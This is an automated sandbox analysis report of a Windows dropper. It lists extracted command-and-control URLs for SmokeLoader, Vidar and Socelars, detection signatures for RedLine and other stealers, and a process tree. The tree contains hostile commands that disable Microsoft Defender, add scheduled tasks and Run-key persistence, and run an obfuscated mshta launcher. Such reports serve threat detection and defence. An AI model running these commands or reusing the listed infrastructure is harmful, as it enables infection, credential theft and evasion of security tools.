Analysis
-
max time kernel
154s -
max time network
153s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
20/12/2021, 14:03
Static task
static1
Behavioral task
behavioral1
Sample
42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe
Resource
win10-en-20211208
General
-
Target
42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe
-
Size
6.7MB
-
MD5
09627559587e099b024796e1b61fbd4c
-
SHA1
28cab95f8d7262958b09a3a622ff14196a05d52a
-
SHA256
42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d
-
SHA512
b8bc5e8afa775a7878e82e6a6fea355a1c61018bdafc9967f8b136ef999490b655daa4ae551c152b7f1e092797929e17f8bfa2d6d5d89865d078d03fe91c94ae
Malware Config
Extracted
socelars
http://www.biohazardgraphics.com/
Extracted
vidar
49.1
915
https://noc.social/@sergeev46
https://c.im/@sergeev47
-
profile_id
915
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2344 1920 rundll32.exe 125 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral2/memory/3772-287-0x0000000000B20000-0x0000000000CEF000-memory.dmp family_redline behavioral2/memory/3772-295-0x0000000000B20000-0x0000000000CEF000-memory.dmp family_redline behavioral2/memory/3956-312-0x00000000011A0000-0x000000000136F000-memory.dmp family_redline behavioral2/memory/1944-372-0x0000000000419332-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000500000001ab63-151.dat family_socelars behavioral2/files/0x000500000001ab63-177.dat family_socelars -
NirSoft WebBrowserPassView 4 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/files/0x000500000001ab6d-159.dat WebBrowserPassView behavioral2/files/0x000500000001ab6d-179.dat WebBrowserPassView behavioral2/memory/4592-305-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView behavioral2/files/0x000600000001ab7c-304.dat WebBrowserPassView -
Nirsoft 7 IoCs
resource yara_rule behavioral2/files/0x000500000001ab6d-159.dat Nirsoft behavioral2/files/0x000500000001ab6d-179.dat Nirsoft behavioral2/memory/2984-252-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft behavioral2/files/0x000500000001ab7b-251.dat Nirsoft behavioral2/files/0x000500000001ab7b-250.dat Nirsoft behavioral2/memory/4592-305-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral2/files/0x000600000001ab7c-304.dat Nirsoft -
Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/1492-272-0x0000000002220000-0x00000000022F9000-memory.dmp family_vidar behavioral2/memory/1492-282-0x0000000000400000-0x000000000053A000-memory.dmp family_vidar -
resource yara_rule behavioral2/files/0x000200000001ab5d-123.dat aspack_v212_v242 behavioral2/files/0x000200000001ab5d-125.dat aspack_v212_v242 behavioral2/files/0x000200000001ab5b-124.dat aspack_v212_v242 behavioral2/files/0x000200000001ab5b-130.dat aspack_v212_v242 behavioral2/files/0x000200000001ab5b-128.dat aspack_v212_v242 behavioral2/files/0x000500000001ab60-127.dat aspack_v212_v242 behavioral2/files/0x000500000001ab60-131.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 29 IoCs
pid Process 4316 setup_installer.exe 4004 setup_install.exe 1492 Sat1266d17883454b1.exe 1876 Sat128942fc3c9a4e75.exe 1912 Sat123037f78f205c.exe 2080 Sat125c6837fefc9.exe 2084 Sat1283d3fd9a.exe 2360 Sat1246754647.exe 2876 Sat127b52b8f420b.exe 3264 Sat1296f0ebf057bb0b.exe 4748 Sat126518fd66e0120.exe 4980 Sat12b734b9ff65fd19.exe 2724 Sat12faf3464bdfb3c.exe 4184 Sat125bf3a6108a6f5e.exe 4216 Sat12d67b11255d.exe 1964 Sat12285b225fb.exe 1572 Sat12285b225fb.exe 3208 Sat12faf3464bdfb3c.exe 3124 Sat1246754647.tmp 2412 Sat1246754647.exe 2984 11111.exe 4704 Sat1246754647.tmp 3212 c8418d7b-b6c4-4659-b441-07aac87c585e.exe 4244 82479f0a-b741-43b9-b53a-c3bb2ed58093.exe 3772 51bda4e0-9596-4be7-9c5f-e572e49e6715.exe 3956 c134ee86-6bbb-4bdb-a875-483c4d842708.exe 4592 11111.exe 4568 3d6b2b16-1850-4c63-bc54-1df3e7a2977a.exe 5116 5207433252074332.exe -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 12 IoCs
pid Process 4004 setup_install.exe 4004 setup_install.exe 4004 setup_install.exe 4004 setup_install.exe 4004 setup_install.exe 4004 setup_install.exe 3124 Sat1246754647.tmp 4704 Sat1246754647.tmp 4552 rundll32.exe 4552 rundll32.exe 4692 regsvr32.exe 4692 regsvr32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\218457123 = "C:\\Users\\Admin\\AppData\\Roaming\\57308631\\5207433252074332.exe" 82479f0a-b741-43b9-b53a-c3bb2ed58093.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 ip-api.com 44 ipinfo.io 45 ipinfo.io 66 ipinfo.io 204 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3772 51bda4e0-9596-4be7-9c5f-e572e49e6715.exe 3956 c134ee86-6bbb-4bdb-a875-483c4d842708.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1964 set thread context of 1572 1964 Sat12285b225fb.exe 105 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 2728 3224 WerFault.exe 167 2480 4544 WerFault.exe 160 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sat12b734b9ff65fd19.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sat12b734b9ff65fd19.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sat12b734b9ff65fd19.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5920 schtasks.exe 5900 schtasks.exe 2304 schtasks.exe 4696 schtasks.exe -
Kills process with taskkill 3 IoCs
pid Process 3856 taskkill.exe 4264 taskkill.exe 1300 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings Sat127b52b8f420b.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 29 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4980 Sat12b734b9ff65fd19.exe 4980 Sat12b734b9ff65fd19.exe 300 powershell.exe 300 powershell.exe 396 powershell.exe 396 powershell.exe 3772 51bda4e0-9596-4be7-9c5f-e572e49e6715.exe 3772 51bda4e0-9596-4be7-9c5f-e572e49e6715.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe 2080 Sat125c6837fefc9.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4980 Install.exe -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeDebugPrivilege 4748 Sat126518fd66e0120.exe Token: SeCreateTokenPrivilege 1912 Sat123037f78f205c.exe Token: SeAssignPrimaryTokenPrivilege 1912 Sat123037f78f205c.exe Token: SeLockMemoryPrivilege 1912 Sat123037f78f205c.exe Token: SeIncreaseQuotaPrivilege 1912 Sat123037f78f205c.exe Token: SeMachineAccountPrivilege 1912 Sat123037f78f205c.exe Token: SeTcbPrivilege 1912 Sat123037f78f205c.exe Token: SeSecurityPrivilege 1912 Sat123037f78f205c.exe Token: SeTakeOwnershipPrivilege 1912 Sat123037f78f205c.exe Token: SeLoadDriverPrivilege 1912 Sat123037f78f205c.exe Token: SeSystemProfilePrivilege 1912 Sat123037f78f205c.exe Token: SeSystemtimePrivilege 1912 Sat123037f78f205c.exe Token: SeProfSingleProcessPrivilege 1912 Sat123037f78f205c.exe Token: SeIncBasePriorityPrivilege 1912 Sat123037f78f205c.exe Token: SeCreatePagefilePrivilege 1912 Sat123037f78f205c.exe Token: SeCreatePermanentPrivilege 1912 Sat123037f78f205c.exe Token: SeBackupPrivilege 1912 Sat123037f78f205c.exe Token: SeRestorePrivilege 1912 Sat123037f78f205c.exe Token: SeShutdownPrivilege 1912 Sat123037f78f205c.exe Token: SeDebugPrivilege 1912 Sat123037f78f205c.exe Token: SeAuditPrivilege 1912 Sat123037f78f205c.exe Token: SeSystemEnvironmentPrivilege 1912 Sat123037f78f205c.exe Token: SeChangeNotifyPrivilege 1912 Sat123037f78f205c.exe Token: SeRemoteShutdownPrivilege 1912 Sat123037f78f205c.exe Token: SeUndockPrivilege 1912 Sat123037f78f205c.exe Token: SeSyncAgentPrivilege 1912 Sat123037f78f205c.exe Token: SeEnableDelegationPrivilege 1912 Sat123037f78f205c.exe Token: SeManageVolumePrivilege 1912 Sat123037f78f205c.exe Token: SeImpersonatePrivilege 1912 Sat123037f78f205c.exe Token: SeCreateGlobalPrivilege 1912 Sat123037f78f205c.exe Token: 31 1912 Sat123037f78f205c.exe Token: 32 1912 Sat123037f78f205c.exe Token: 33 1912 Sat123037f78f205c.exe Token: 34 1912 Sat123037f78f205c.exe Token: 35 1912 Sat123037f78f205c.exe Token: SeDebugPrivilege 1876 Sat128942fc3c9a4e75.exe Token: SeDebugPrivilege 4216 Sat12d67b11255d.exe Token: SeDebugPrivilege 300 powershell.exe Token: SeDebugPrivilege 396 powershell.exe Token: SeDebugPrivilege 3856 taskkill.exe Token: SeDebugPrivilege 4568 3d6b2b16-1850-4c63-bc54-1df3e7a2977a.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3672 wrote to memory of 4316 3672 42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe 69 PID 3672 wrote to memory of 4316 3672 42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe 69 PID 3672 wrote to memory of 4316 3672 42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe 69 PID 4316 wrote to memory of 4004 4316 setup_installer.exe 70 PID 4316 wrote to memory of 4004 4316 setup_installer.exe 70 PID 4316 wrote to memory of 4004 4316 setup_installer.exe 70 PID 4004 wrote to memory of 4424 4004 setup_install.exe 73 PID 4004 wrote to memory of 4424 4004 setup_install.exe 73 PID 4004 wrote to memory of 4424 4004 setup_install.exe 73 PID 4004 wrote to memory of 4436 4004 setup_install.exe 74 PID 4004 wrote to memory of 4436 4004 setup_install.exe 74 PID 4004 wrote to memory of 4436 4004 setup_install.exe 74 PID 4004 wrote to memory of 4716 4004 setup_install.exe 75 PID 4004 wrote to memory of 4716 4004 setup_install.exe 75 PID 4004 wrote to memory of 4716 4004 setup_install.exe 75 PID 4004 wrote to memory of 520 4004 setup_install.exe 76 PID 4004 wrote to memory of 520 4004 setup_install.exe 76 PID 4004 wrote to memory of 520 4004 setup_install.exe 76 PID 4004 wrote to memory of 588 4004 setup_install.exe 77 PID 4004 wrote to memory of 588 4004 setup_install.exe 77 PID 4004 wrote to memory of 588 4004 setup_install.exe 77 PID 4004 wrote to memory of 780 4004 setup_install.exe 78 PID 4004 wrote to memory of 780 4004 setup_install.exe 78 PID 4004 wrote to memory of 780 4004 setup_install.exe 78 PID 4004 wrote to memory of 912 4004 setup_install.exe 79 PID 4004 wrote to memory of 912 4004 setup_install.exe 79 PID 4004 wrote to memory of 912 4004 setup_install.exe 79 PID 4436 wrote to memory of 300 4436 cmd.exe 80 PID 4436 wrote to memory of 300 4436 cmd.exe 80 PID 4436 wrote to memory of 300 4436 cmd.exe 80 PID 4424 wrote to memory of 396 4424 cmd.exe 83 PID 4424 wrote to memory of 396 4424 cmd.exe 83 PID 4424 wrote to memory of 396 4424 cmd.exe 83 PID 4004 wrote to memory of 1088 4004 setup_install.exe 81 PID 4004 wrote to memory of 1088 4004 setup_install.exe 81 PID 4004 wrote to memory of 1088 4004 setup_install.exe 81 PID 4004 wrote to memory of 1208 4004 setup_install.exe 82 PID 4004 wrote to memory of 1208 4004 setup_install.exe 82 PID 4004 wrote to memory of 1208 4004 setup_install.exe 82 PID 912 wrote to memory of 1492 912 cmd.exe 85 PID 912 wrote to memory of 1492 912 cmd.exe 85 PID 912 wrote to memory of 1492 912 cmd.exe 85 PID 4004 wrote to memory of 1360 4004 setup_install.exe 84 PID 4004 wrote to memory of 1360 4004 setup_install.exe 84 PID 4004 wrote to memory of 1360 4004 setup_install.exe 84 PID 4004 wrote to memory of 1616 4004 setup_install.exe 93 PID 4004 wrote to memory of 1616 4004 setup_install.exe 93 PID 4004 wrote to memory of 1616 4004 setup_install.exe 93 PID 4004 wrote to memory of 1784 4004 setup_install.exe 92 PID 4004 wrote to memory of 1784 4004 setup_install.exe 92 PID 4004 wrote to memory of 1784 4004 setup_install.exe 92 PID 780 wrote to memory of 1876 780 cmd.exe 86 PID 780 wrote to memory of 1876 780 cmd.exe 86 PID 588 wrote to memory of 1912 588 cmd.exe 91 PID 588 wrote to memory of 1912 588 cmd.exe 91 PID 588 wrote to memory of 1912 588 cmd.exe 91 PID 1088 wrote to memory of 2084 1088 cmd.exe 90 PID 1088 wrote to memory of 2084 1088 cmd.exe 90 PID 1088 wrote to memory of 2084 1088 cmd.exe 90 PID 520 wrote to memory of 2080 520 cmd.exe 89 PID 520 wrote to memory of 2080 520 cmd.exe 89 PID 520 wrote to memory of 2080 520 cmd.exe 89 PID 4716 wrote to memory of 2360 4716 cmd.exe 88 PID 4716 wrote to memory of 2360 4716 cmd.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe"C:\Users\Admin\AppData\Local\Temp\42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCD050576\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:300
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1246754647.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exeSat1246754647.exe5⤵
- Executes dropped EXE
PID:2360 -
C:\Users\Admin\AppData\Local\Temp\is-KN6R9.tmp\Sat1246754647.tmp"C:\Users\Admin\AppData\Local\Temp\is-KN6R9.tmp\Sat1246754647.tmp" /SL5="$5003A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3124 -
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe"C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe" /SILENT7⤵
- Executes dropped EXE
PID:2412 -
C:\Users\Admin\AppData\Local\Temp\is-D5NR0.tmp\Sat1246754647.tmp"C:\Users\Admin\AppData\Local\Temp\is-D5NR0.tmp\Sat1246754647.tmp" /SL5="$50030,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4704
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat125c6837fefc9.exe4⤵
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat125c6837fefc9.exeSat125c6837fefc9.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2080 -
C:\Users\Admin\Pictures\Adobe Films\f385xJqohThJ_S4i9aqhmluG.exe"C:\Users\Admin\Pictures\Adobe Films\f385xJqohThJ_S4i9aqhmluG.exe"6⤵PID:4120
-
-
C:\Users\Admin\Pictures\Adobe Films\PbizHT_GiNI_OBWBgT2O7KGz.exe"C:\Users\Admin\Pictures\Adobe Films\PbizHT_GiNI_OBWBgT2O7KGz.exe"6⤵PID:2160
-
-
C:\Users\Admin\Pictures\Adobe Films\sZ5WLF4gnGehdFz_RaGLerfr.exe"C:\Users\Admin\Pictures\Adobe Films\sZ5WLF4gnGehdFz_RaGLerfr.exe"6⤵PID:1140
-
C:\Users\Admin\Documents\I80SCQZWXpF_aGH7seYKqBTU.exe"C:\Users\Admin\Documents\I80SCQZWXpF_aGH7seYKqBTU.exe"7⤵PID:5904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:2304
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:4696
-
-
-
C:\Users\Admin\Pictures\Adobe Films\dnEusqy0n2UlbCW2GeWfi9st.exe"C:\Users\Admin\Pictures\Adobe Films\dnEusqy0n2UlbCW2GeWfi9st.exe"6⤵PID:5088
-
-
C:\Users\Admin\Pictures\Adobe Films\IezJI9eppv8Mh8oMeW3FqRbZ.exe"C:\Users\Admin\Pictures\Adobe Films\IezJI9eppv8Mh8oMeW3FqRbZ.exe"6⤵PID:1840
-
C:\Users\Admin\AppData\Local\5e47281b-04e5-4cc7-8698-b5a4d9bbec6d.exe"C:\Users\Admin\AppData\Local\5e47281b-04e5-4cc7-8698-b5a4d9bbec6d.exe"7⤵PID:6108
-
-
C:\Users\Admin\AppData\Local\e3aefdc4-7104-4208-9a1d-ba637a78d7ee.exe"C:\Users\Admin\AppData\Local\e3aefdc4-7104-4208-9a1d-ba637a78d7ee.exe"7⤵PID:2396
-
-
C:\Users\Admin\AppData\Local\de1ec6cb-b27f-43f7-baed-2147d3570496.exe"C:\Users\Admin\AppData\Local\de1ec6cb-b27f-43f7-baed-2147d3570496.exe"7⤵PID:5276
-
-
C:\Users\Admin\AppData\Local\38ce38cd-754e-47e7-beba-c87b8ceb4f2c.exe"C:\Users\Admin\AppData\Local\38ce38cd-754e-47e7-beba-c87b8ceb4f2c.exe"7⤵PID:4900
-
-
C:\Users\Admin\AppData\Local\1dcf6d84-0acf-47a1-b54c-59f9f5dedd5b.exe"C:\Users\Admin\AppData\Local\1dcf6d84-0acf-47a1-b54c-59f9f5dedd5b.exe"7⤵PID:4572
-
-
-
C:\Users\Admin\Pictures\Adobe Films\P25dm9wh3jR4wL3mweXvqhb9.exe"C:\Users\Admin\Pictures\Adobe Films\P25dm9wh3jR4wL3mweXvqhb9.exe"6⤵PID:4312
-
-
C:\Users\Admin\Pictures\Adobe Films\Z3jtMs6ta7h1zfKHCA_xP81F.exe"C:\Users\Admin\Pictures\Adobe Films\Z3jtMs6ta7h1zfKHCA_xP81F.exe"6⤵PID:2136
-
-
C:\Users\Admin\Pictures\Adobe Films\JURcYUlgBJjMvTOR5Ih9xZj6.exe"C:\Users\Admin\Pictures\Adobe Films\JURcYUlgBJjMvTOR5Ih9xZj6.exe"6⤵PID:2128
-
-
C:\Users\Admin\Pictures\Adobe Films\KAD91NfhI1G1vIiW1WBr__4y.exe"C:\Users\Admin\Pictures\Adobe Films\KAD91NfhI1G1vIiW1WBr__4y.exe"6⤵PID:4024
-
C:\Users\Admin\Pictures\Adobe Films\KAD91NfhI1G1vIiW1WBr__4y.exe"C:\Users\Admin\Pictures\Adobe Films\KAD91NfhI1G1vIiW1WBr__4y.exe"7⤵PID:3224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 248⤵
- Program crash
PID:2728
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\5qd39TLFKNA_VeTlIQbFTaa8.exe"C:\Users\Admin\Pictures\Adobe Films\5qd39TLFKNA_VeTlIQbFTaa8.exe"6⤵PID:2728
-
C:\Users\Admin\Pictures\Adobe Films\5qd39TLFKNA_VeTlIQbFTaa8.exe"C:\Users\Admin\Pictures\Adobe Films\5qd39TLFKNA_VeTlIQbFTaa8.exe"7⤵PID:4212
-
-
-
C:\Users\Admin\Pictures\Adobe Films\r7vqnR0xrf1mL8p7XP7q2N55.exe"C:\Users\Admin\Pictures\Adobe Films\r7vqnR0xrf1mL8p7XP7q2N55.exe"6⤵PID:3852
-
C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe"C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe"7⤵PID:4996
-
-
C:\Users\Admin\AppData\Local\Temp\zhangting.exe"C:\Users\Admin\AppData\Local\Temp\zhangting.exe"7⤵PID:3780
-
C:\Users\Admin\AppData\Local\Temp\zhangting.exe"C:\Users\Admin\AppData\Local\Temp\zhangting.exe" -u8⤵PID:5152
-
-
-
C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe"C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe"7⤵PID:1972
-
-
C:\Users\Admin\AppData\Local\Temp\inst.exe"C:\Users\Admin\AppData\Local\Temp\inst.exe"7⤵PID:4780
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:2948
-
-
C:\Users\Admin\AppData\Local\Temp\setup1.exe"C:\Users\Admin\AppData\Local\Temp\setup1.exe"7⤵PID:5200
-
-
C:\Users\Admin\AppData\Local\Temp\racoon.exe"C:\Users\Admin\AppData\Local\Temp\racoon.exe"7⤵PID:5312
-
-
C:\Users\Admin\AppData\Local\Temp\askhelp.exe"C:\Users\Admin\AppData\Local\Temp\askhelp.exe"7⤵PID:5400
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"7⤵PID:5724
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵PID:5832
-
-
C:\Users\Admin\AppData\Local\Temp\logger.exe"C:\Users\Admin\AppData\Local\Temp\logger.exe"7⤵PID:5912
-
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"7⤵PID:6000
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"7⤵PID:6136
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵PID:720
-
-
-
C:\Users\Admin\Pictures\Adobe Films\z_dIUaHNLmGNcR2eEYUv1t5u.exe"C:\Users\Admin\Pictures\Adobe Films\z_dIUaHNLmGNcR2eEYUv1t5u.exe"6⤵PID:3864
-
-
C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe"C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe"6⤵PID:4664
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: cLose (CREatEObJECT ("wSCripT.sHeLl" ).Run ("C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """"== """" for %e In (""C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe"" ) do taskkill /iM ""%~Nxe"" -f ",0 , TrUe ) )7⤵PID:1112
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /r TyPE "C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe"> ..\ZCJQBxDe1bLl.exE &&staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If ""== "" for %e In ("C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe" ) do taskkill /iM "%~Nxe" -f8⤵PID:6124
-
C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe9⤵PID:360
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\03YtOE00pXvhdDtGW8neB4Ah.exe"C:\Users\Admin\Pictures\Adobe Films\03YtOE00pXvhdDtGW8neB4Ah.exe"6⤵PID:4816
-
-
C:\Users\Admin\Pictures\Adobe Films\uULgUXye9012XpyfSiCgyp37.exe"C:\Users\Admin\Pictures\Adobe Films\uULgUXye9012XpyfSiCgyp37.exe"6⤵PID:3184
-
C:\Users\Admin\AppData\Local\Temp\7zS98FB.tmp\Install.exe.\Install.exe7⤵
- Suspicious behavior: MapViewOfSection
